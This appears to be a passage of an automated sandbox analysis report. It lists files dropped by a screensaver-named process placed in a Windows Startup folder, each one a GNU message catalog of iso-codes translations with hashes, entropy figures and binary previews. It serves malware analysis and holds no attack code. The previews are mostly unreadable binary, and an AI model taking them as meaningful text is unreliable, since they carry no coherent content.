                                                                                                    SSDEEP:384:pyRSKz9sEwz/rZhgPMlAu9fMxbje5wsOP4XLAI1irGk3adOpeHNMw7iiF7d9kne:pc6w8Au9fg6msOP4XLAIqhbViF7ge
                                                                                                    MD5:4851A1290AF6DDB63DBAFF04E97A0987
                                                                                                    SHA1:3D7B47280D2D88FE08F26D304274196C6D0F8BF8
                                                                                                    SHA-256:07A1D16B5B966E36E95E962BF6808EDC8BADEFD3EF857F66C3B0D3E676AB758E
                                                                                                    SHA-512:8F7D98DF6B2A54889256740676202838512AC436981382BD9C40742D81D5D0BB6BE5B5F2EE63E84E07640AD34F07DE9CE791857CD34D5376CBB0BC7C34667BF6
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......#.......#......$#......7#......?#......E#......O#......W#......b#......j#......r#......}#.......#.......#.......#.......#.......#.......#.. ....#.......#.......#.. ....#.......$......3$......<$......J$......Q$......p$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......%%......=%......F%......_%..,...{%.......%.......%..%....%.......%.......%.......%.......%.......&.......&.......&...... &..%.../&..,...U&.."....&..*....&.......&.......&.......&.......&.......&.......'......!'......''......3'......E'......M'......U'......^'......z'..'....'..$....'.......'.......'.......(......)(......H(......f(......k(......s(......z(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......)......%)....../)......7)......B)......G)......Q)......Z)......a)......o)......v)......|)..!....)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2100 messages, Project-Id-Version: iso_3166-2 '\343\202\250\343\202\246\343\202\242'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99516
                                                                                                    Entropy (8bit):5.227387155200333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:VkiJB/fMUroxcrn6iZtqyIzMC7z5pURXR0UY+3zblrutM3UoVATuxFHb:eIBnZro2sR7z0UUYI/lrutM3UoVATMF7
                                                                                                    MD5:45AEAEA4DA6C200E27A461DF1B32E9B9
                                                                                                    SHA1:21BACA8F54C5C8D2C58DFDF4CC4718A79A5491F4
                                                                                                    SHA-256:F60AF1263A27993C4135C6DF27C1E65EACA00CE904C2EA78B1EE0EE3C3225EBE
                                                                                                    SHA-512:1B6F227B8EFADEE10DDE68F1ADA6ACC51A39FCC295813A31A167E20CE35D5D1AC20E3766F1AA845CC02ABEB50132539F100A13551C151B37CB0584C08FA6366C
                                                                                                    Malicious:false
                                                                                                    Preview:........4........A......\....... .......!.......&.......-.......;.......I.......N.......S.......\.......d.......i.......q.......v............................................................................................................................................ .......&...............8.......M.......].......h.......t...........................................................................................................................................&...............4.......?.......G.......N.......W.......d.......r........................................................................................................................................-.......5.......F.......P.......W.......].......e.......l.......s.......{....................................................................................................................................*.......3.......;.......D.......K.......R.......b.......h.......p.......y.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\233\275\345\215\227\346\245\265\351\240\230\345\234\237'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2724
                                                                                                    Entropy (8bit):5.846765710516419
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADbdM3NvGqIfdvqNuoUau9HwWFEEWMgbtS1uF/go6F:qDEyBoHUwWh+bto5ou
                                                                                                    MD5:BEDA21072768FB3BBFA172E0980AA196
                                                                                                    SHA1:4D18E533C667D60CD9C1DE8A37B8C1EB654D2372
                                                                                                    SHA-256:7E187BFF34F1CDDDC58525446E1AB3294710F26C280A40E34C7C87246578E83F
                                                                                                    SHA-512:763094B3D708FD2536C7D096866798BF08F052BF3381FD104E70BA441CBEB139E84AFD9565CD8A8CB1A711330D571A8C1DEB490B54F7638E17DEED621377861B
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........y...........#...$...6...2...[...'.......0...............$...............#...,...$...P...'...u...........$.......................$.........../.......<...!...[.......}...$...............................,...................:.......V...'...f................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'ADB\345\213\230\345\256\232\345\215\230\344\275\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10051
                                                                                                    Entropy (8bit):5.313678073248342
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfme0qVE4pls6dgjCnMLCkwILo+clMGzhnZiM+Z7bnjuU7NMkvKL9Cf:TIDmwVjpndgmn2DwIM/PnIM+BLiCukvp
                                                                                                    MD5:388AC76B9CE7D04408967D09FF30E7CA
                                                                                                    SHA1:A37880A70ACC132D4006851DD8E876AD55997A65
                                                                                                    SHA-256:3A93A0805A274B577B2FC6B245A92474C8BA3CC91490FDDD2ADC06346232D777
                                                                                                    SHA-512:862696D372BEEF347C99B890129823F142C9E2B3B5A156C25F60E56CE038F2786FEB2761AAD84AD739A571C8615C674ACE70E4A30905A1781AD076A65A7BD806
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 348 messages, Project-Id-Version: iso_639-3 '\343\202\242\343\203\226\343\203\217\343\202\270\343\202\242\350\252\236'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16790
                                                                                                    Entropy (8bit):5.101586919679552
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:WiKl/5ScVApJXuVhuCWrFMrsQiiByQ1vUmdGS2FwQlEv:WiKj+8ER7Bs
                                                                                                    MD5:E85BF0FA10668E5606671AE334873329
                                                                                                    SHA1:6BD880942CBA4777B3E020A40E21B585F070A2C8
                                                                                                    SHA-256:15959893F5FF54015781AAC3BD43A53D0837EB7361637CA787FEAFBE56CBE1AA
                                                                                                    SHA-512:3259CC5262EBCFAD6C2ECC5092FCB4207516709542B72C0350F82967B40D25DB312596075B148DA6D5DE1066677517A4F2B9ACEE9F48B0B50FD7AC65066E10E7
                                                                                                    Malicious:false
                                                                                                    Preview:........\.......................(.......).......3.......<.......B.......J.......O.......X.......b.......g.......p.......y.......................................................................................................................................................................!.......).......2.......8.......=.......E.......M.......R.......Y.......b.......l.......s.......{.......................................................................................................................................................(.......-.......3.......<.......B.......I.......P.......W.......`.......f.......m.......r.......x.......~................................................................................................................ ....... ....... ....... ....... ......$ ......- ......3 ......6 ......< ......A ......F ......O ......V ......a ......g ......q ......x ......~ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 191 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8321
                                                                                                    Entropy (8bit):4.693846065185963
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7YJP7qNGMPxR6NMt9S8NagudkPqpFHWses5:cP7SaNMt9HogudkPg2seo
                                                                                                    MD5:0F66F17B44716E68A3F8782C30732D7E
                                                                                                    SHA1:0F7EDF95254A8B0B1536C92DDA99CD412E8271BD
                                                                                                    SHA-256:BB0198F793CA41A361AD51F270542FC16D519B3C5AF7D474A39107FED25E8762
                                                                                                    SHA-512:0C1E0DD63CE8419DB6D614B30EF75EAC0FFD76364E328C15BC4C6B1578DF99CEC4EF64815094C2D1ACCE974729DF84AC83E4EE51BF9815722A7E44CD7CD94A5F
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................%.......-.......5.......<.......E.......Y.......c.......k.......q.......{.......................................................................................................................................*.......2.......;.......D.......K.......Z.......s.......x.......~.......................................................................................................................................'.......F.......K.......S.......Z.......h.......n.......v.......~.......................................................................................................................................................................%.......,.......7.......=.......F.......M.......X......._.......g.......o.......w.......}...............................................................................................................................................!.......,.......4.......?.......G.......O.......U.......[.......g.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 105 messages, Project-Id-Version: iso_15924 '\341\203\220\341\203\223\341\203\232\341\203\220\341\203\233\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6755
                                                                                                    Entropy (8bit):4.809964796804114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Kc0+kjQ6OfuiHfheaoZ5Etny5g0stJKkWO3Ia4Lp7iGEFmpU8/SdI5rY:Kc0+kjQ6xiHpeaKetn6pstJK3npUB4Y
                                                                                                    MD5:6A17EFF061DE3221765F27EB7457E1D6
                                                                                                    SHA1:2A1D21CD95CBFCC7A79359997EBC2B8142B19882
                                                                                                    SHA-256:5FB11A0C43411B2140E6DE3ABACD09F4F05D4B7535BD3F2DDE88E33E85975342
                                                                                                    SHA-512:0EC57FE5EF567DDDA2CBAAB7621878B6A28E9680E59D65ED1CE0E81C175A4F74B48AB74BC7F48946878FD085F40A54A21921C3B9DA8D51C70D50150D20731F57
                                                                                                    Malicious:false
                                                                                                    Preview:........i.......d.......................................................#.......=.......F.......N.......W.......].......g.......m.......u.......................................................................................................................................................$.......*.......3.......<.......C.......J.......S.......d.......z...........................................................................#...........................................".......+.......2.......9.......B.......L.......W......._.......m.......~.......................................................................................................................!.......*.......5.......E.......K.......U.......`.......h.......u...................................................................................................................%...............................................*...........D...O...Z......................................................./.......K.......g...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\341\203\220\341\203\225\341\203\246\341\203\220\341\203\234\341\203\224\341\203\227\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36655
                                                                                                    Entropy (8bit):4.7742458545441675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oCOBz48fmsWP48WAI6TYVmWlox0zer+ZEL20:bC6484TYVmWlox0zeSSa0
                                                                                                    MD5:A48E71CC3A1A0F849A1D9EE8E838134F
                                                                                                    SHA1:1B95D03C9C5A3342430F34DE2808BAF929C2CEC2
                                                                                                    SHA-256:6680ECCC467746851FD119A60BE64C58D174A4344D4DEC7996E72025D4C11587
                                                                                                    SHA-512:B5A0948100D8FED6C89B9BD6E2178CBCB17CDE51495B7293EAA8726855BA0BADB7AF1C9DAA5B65F45ACAB64461B48CADAC44FF72548283B5B6C8E8D334931535
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1942 messages, Project-Id-Version: iso_3166-2 '\341\203\220\341\203\221\341\203\224\341\203\240\341\203\223\341\203\230\341\203\234\341\203\250\341\203\230\341\203\240\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111221
                                                                                                    Entropy (8bit):4.8857916225246765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:BS/AMdiB/YuF8oflQ20SCnidXZxzOgzbLDFNvphDcXqpWyVKruEAun6b+kVC2RLv:wfQ7FJNQ20SCnidXZxzOgzbLDFNvphD1
                                                                                                    MD5:C3C0A91A9DD6A5B74C98F4440FD4360E
                                                                                                    SHA1:670175B6DCB93BA49F5E5A2532799ACDAB509A74
                                                                                                    SHA-256:48358F6D36510F2E9CC48E181067068827254E91B815C3547D918638B99040F3
                                                                                                    SHA-512:E33A06EBEC3F6A2D103957CED00AFFC4882785A9A0EF88F7D2940264BB954E1239654E8438C75A6A4A06CF747F834B619B10838AB9593952CCFFC915E6351E4C
                                                                                                    Malicious:false
                                                                                                    Preview:.................<......|y......................................................%.......+.......5.......:.......B.......H.......T.......Z.......d.......i.......x.......................................................................................................................................................&......./.......6.......;.......D.......J.......R.......Y.......e.......l.......s.......|...................................................................................................................#.......2.......:.......K.......U.......[.......b.......i.......q.......~.................................................................................................................................................%...............6.......>.......G.......O.......T.......].......h.......p.......w.......|................................................................................................................................$.......+.......4.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\341\203\221\341\203\240\341\203\230\341\203\242\341\203\220\341\203\234\341\203\224\341\203\227\341\203\230\341\203\241 \341\203\220\341\203\234\341\203\242\341\203\220\341\203\240\341\203\245\341\203\242\341\203\230\341\203\231\341\203\230\341\203\241 \341\203\242\341\203\224\341\203\240\341\203\230\341\203\242\341\203\235\341\203\240\341\203\230\341\203\220'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4426
                                                                                                    Entropy (8bit):4.95459264439643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLvkuxC+yaCo+vmI0XE0xbdgb0N6nhq6KEVoz5LVO+RTAoLZlA:XoeFq90xbd/AnhVfVoz5LVO+BAoLZy
                                                                                                    MD5:254F092F3B7F849D751E16D66A927125
                                                                                                    SHA1:1B2A7E191B6C507BCC95CAEAB0E035AF79609214
                                                                                                    SHA-256:51277E37EB1B5BFCCD980B82FFECAF8AD29E9C702BF3E8E026350F12D43C9F0D
                                                                                                    SHA-512:96C2CD38568C9EA92AA9142FEF57BC21F6A9FD2455ECE8A7B6CD57832E1FF4DC7F1CC89A6D35169B4C6C1C4F801198024B607EDD0D6E81F4DD71A5042B183E46
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................\.......o...'...........Z...........u...........5.......1...S...=.......K..............._.......Q.......1...M...1.......@.......+.......%.......D...D...2.......;...............+...........7...........>...Z...`.......(.......m...#...........1............... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 173 messages, Project-Id-Version: iso_4217 '\341\203\220\341\203\225\341\203\246\341\203\220\341\203\234\341\203\243\341\203\240\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13229
                                                                                                    Entropy (8bit):4.791337133040459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lTnSKb0G/dz/Cj0cLo4zY8+KjTwst6C5i7YWjoTKtN0lGG:lTSKoAdzLcLo408+cTwy
                                                                                                    MD5:71FA8B38428D64596E242DBF0BA898D5
                                                                                                    SHA1:A60A6D11815531738524D101933836FE0FD78454
                                                                                                    SHA-256:DC434B7D44820BBF7720C5FCD224A4B57E2BA63E2177FCC3A24CC41087096092
                                                                                                    SHA-512:B6B0FABAA49E4C7DB9F0342337A8B160B02479150AC33BFE186B3FB4752693C662AB4C25C41BF5D06DC1242F2171D83CEE45AA9C2D1F207FFB8BBB2C0C342496
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................!.......1.......B.......P.......a.......k...1...}...3...................................................+.......5.......G.......W.......m.......z...............................................................................................................-.......2.......H.......W.......i.......x.......}...............................................................................................................&.......3.......?.......O......._.......o.......t.......y.......................................................................................................................................-...!...:.......\.......i.......y...............................................................................................,.......<.......D.......S.......].......d.......n.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.156056824864604
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxq7HCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG9WWXmBQ8KMW0YEi9:i4cxxq7it02Ukx/iximCg5ITmvXmBQWk
                                                                                                    MD5:67B80B1B37164294FA03BC8692D9F6D8
                                                                                                    SHA1:213C59FC26A577778B3E697F62177100139017F7
                                                                                                    SHA-256:682E1D062677461BD3A46665C35CB66AE8AAEA48235A47BC00B9C86AA84FB1EE
                                                                                                    SHA-512:9B3789E98D8AC4A216903BD69821C246B21E85CE4E1995CBB8397F1EB3814EBDCFD7E5D846740D5B662EB0CE02F462C852C9A783E9D8DEBA67B8CB712A75C93E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ka.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\341\203\220\341\203\244\341\203\240\341\203\235-\341\203\220\341\203\226\341\203\230\341\203\243\341\203\240\341\203\230 \341\203\224\341\203\234\341\203\224\341\203\221\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11127
                                                                                                    Entropy (8bit):4.768490600288976
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxPhLrBKq8SE0BfNcaoBNNN+NdN7NVNWNuNtNYNoN8NPNrNyNq3NqXNqvNq6Nd:XRhLrMqHE0BfNca6sMUpYLcuceUAKw4A
                                                                                                    MD5:A3E507C2C74987095D991E2C445F0E6F
                                                                                                    SHA1:8AD302327E6A216B0109461948E56799E105DE44
                                                                                                    SHA-256:F559BBE6791E96E0E5AC36E0C44B15038BBEC5E4EB0617B96D32A23E0674EE76
                                                                                                    SHA-512:522E82EA05EA8FEBEA7EBC149D3052ABF5ABD173047A3E16E34961BE6986D8443991595952BB8C303731087DB6C328C49636C0AE5B3283CB2F36AD700CADF1EE
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#......................................./.......4.......(...T...%...}...+...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_15924 'Ta\311\233rabt'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):571
                                                                                                    Entropy (8bit):5.32505887220515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iTlEtxCfVt02UkPIB1/1Xiq2LLW/4vRXPXmBQWiOW+D:oeCVt0UPIf1XjX/EXmGq
                                                                                                    MD5:36B9A47493C6668197505F6CAE0C64B8
                                                                                                    SHA1:A48039AF208C5EA763A5E93B5E165DA7D82F4446
                                                                                                    SHA-256:590D385644A99418806F3C941B921D13051DD2277CF06F4CA3DD79232E52D93F
                                                                                                    SHA-512:1AC6BCEA1BA04DF6F29A32918D877A1FAEFD86F073175DB29D4B164CA67457A4F961A8AD55C19CC8FF60B1E450C463185DA53BC6126E0829F942F05C909F18DB
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......X.......2........................Arabic.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-05-30 10:41+0000.Last-Translator: ButterflyOfFire <ButterflyOfFire@protonmail.com>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-15924/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.1-dev..Ta.rabt.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 144 messages, Project-Id-Version: iso_3166-1 'Af\311\243anistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6371
                                                                                                    Entropy (8bit):4.760705654684784
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bEIHtWNAY/Me8yngkJL4kEfMrD7W6+zZ/4uRVbx9yMkC+/ghDuH/l:bzarxguskRDSrzZ/4ox48+IhDGl
                                                                                                    MD5:4BD8AB0902EE5E76EFE26CAF6CCBAF75
                                                                                                    SHA1:6BA8BE35714C405A9E1B7C62016A037DE767A793
                                                                                                    SHA-256:C25C2F78E03B32D1FB3677DDA6932F91EFA88B3BF51EAD0464BB45C96BB8CEAE
                                                                                                    SHA-512:F5A230FB83B3437FB125BE591E21AC1D842B340684EBCDE38D72C92ADF82215060A3344CCA2E160AF34D7A3039E20E7874B37425242DB667FE55CE2934DF4D72
                                                                                                    Malicious:false
                                                                                                    Preview:................................ .......!.......-.......5.......=.......E.......L.......U.......i.......s.......{...............................................................................................................................................#.......+.......4.......;.......T.......Y......._.......h.......p.......{...............................................................................................................................................................&.......-.......;.......D.......L.......R.......\.......a.......................................................................................................................................................................".......-.......4.......<.......C.......K.......V.......^.......f.......r.......~...............................................................................................................................5.......=.......D... ...Z.......{...............................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 16 messages, Project-Id-Version: iso_3166-2 'Lezzayer'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1099
                                                                                                    Entropy (8bit):5.177719607723013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2DaKhXSyimnTqhtihzUCiSt0UT1yr/aXmGQSHQ:Qa0SyimTqczUCi/URyfzSw
                                                                                                    MD5:A98228E841B32DA2D6E134BECEF57246
                                                                                                    SHA1:360CBCF32083B75B248B911256156659E61B4C07
                                                                                                    SHA-256:459D9AA1715597DC34987E3ED6EDB3AC4FDA560B6E3558CB85C14C36DFF189BB
                                                                                                    SHA-512:8CE81460B8AC8A001E5A74D17E8EDE45658FA8FA2D4D32AB5A00CCFF81A921EF54FD9734AEB0E0C3B70AD2665339933B09F8719B0117E770C018E0CE5784ABE2
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...............................................................................................................................................................................................................$.......+.......2.......9.......D................................................................................................Alger.Annaba.Bouira.B.ja.a.Chlef.Constantine.Djelfa.Illizi.Laghouat.Oran.Ouargla.Sa.da.S.tif.Tizi Ouzou.T.bessa.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2024-01-10 05:06+0000.Last-Translator: ButterflyOfFire <boffire@users.noreply.hosted.weblate.org>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 5.4-dev..Lezzayer..ennaba.Tu
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_4217 'Adinar azzayri'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):830
                                                                                                    Entropy (8bit):5.218572717457691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i26vsBtRsisCh/MVEMTlALxRt02UkPIB1/1Xiq2LLW/4XQXPXmBQWiOWaKnDkk:mvmZ/Wl8Pt0UPIf1XjX/6WXmGtx
                                                                                                    MD5:946217B1934BA3AB9FFF7AAE9AC4EA78
                                                                                                    SHA1:5D05EC877DA757823D655BCB798C03FC03E770BF
                                                                                                    SHA-256:584028829E4C8000D5BE22F26634FAE0585692220FAC258082A5EE6B4D31B484
                                                                                                    SHA-512:4E9E33EEED02B56ED3A402CFBA9598853292CC1BB15B8B32554EEBA011F2C07E4FED9E987E36CE889F9D94A71C63F23B6F470A8577BC3FF2845CCF78AF04C246
                                                                                                    Malicious:false
                                                                                                    Preview:................T............................................................................................................... .......0................................................Algerian Dinar.Iraqi Dinar.Kuwaiti Dinar.Libyan Dinar.Serbian Dinar.Tunisian Dinar.Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-05-30 10:41+0000.Last-Translator: ButterflyOfFire <ButterflyOfFire@protonmail.com>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-4217/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.1-dev..Adinar azzayri.Adinar a.iraqi.Adinar akuweyti.Adinar alibi.Adinar a.irbi.Adinar atunsi.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 12 messages, Project-Id-Version: iso_639-3 'Tabxazit'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):979
                                                                                                    Entropy (8bit):5.168205214139948
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8wlbbUDmLrsx+udEVt0UKWg7/2MXmGC8lN:zHwxJEMUKJ7+NRAN
                                                                                                    MD5:59DC866BB16955994701DC7FA68B8BBF
                                                                                                    SHA1:EB65E907605E75F815811CBEE5FA0165D904211F
                                                                                                    SHA-256:264028F523333EB24573E3EEAEA510EA46EF3F09716F5F7168DCF16D03A07FDB
                                                                                                    SHA-512:C59D48959219A759FD8E198C39D9EA3C25B3E9D2F4B3099836384003E224609DBE439A2854D5A1FEB6AD4724B7BC2EE9083D83A72BAFDD3EFE62F5839644B2B9
                                                                                                    Malicious:false
                                                                                                    Preview:................|............... .......!.......+.......0.......:.......?.......G.......N.......W.......^.......v.......}...............].......f.......n.......y................................................................................................................................Abkhazian.Afar.Afrikaans.Akan.Amharic.Arabic.Assamese.Avaric.Central Atlas Tamazight.French.Kabyle.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-10-17 03:27+0000.Last-Translator: Hakim Oubouali <hakim.oubouali.skr@gmail.com>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-639-3/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.3.1-dev..Tabxazit.Tafarit.Tafrikanst.Takanit.Tamharikt.Ta.rabt.Tasamizt.Tavarikt.Tamazi.t n ume..uk.Tafransist.Taqbaylit.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-5
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.161051593620953
                                                                                                    Encrypted:false
